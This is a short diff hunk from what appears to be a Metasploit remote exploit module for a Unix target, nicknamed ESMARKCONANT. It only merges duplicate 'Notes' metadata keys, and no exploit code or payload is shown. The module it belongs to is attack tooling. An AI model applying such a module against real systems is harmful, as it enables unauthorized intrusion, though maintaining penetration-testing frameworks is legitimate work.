@@ -45,15 +45,12 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Notes' =>
         {
+          'Stability' => [Msf::CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => [],
           'AKA' => ['ESMARKCONANT']
         },
       'Platform'       => 'unix',
-      'Notes' =>
-        {
-          'Stability' => [Msf::CRASH_SAFE],
-          'SideEffects' => [],
-          'Reliability' => []
-        },
       'Arch'           => ARCH_CMD,
       'Targets'        =>
         [
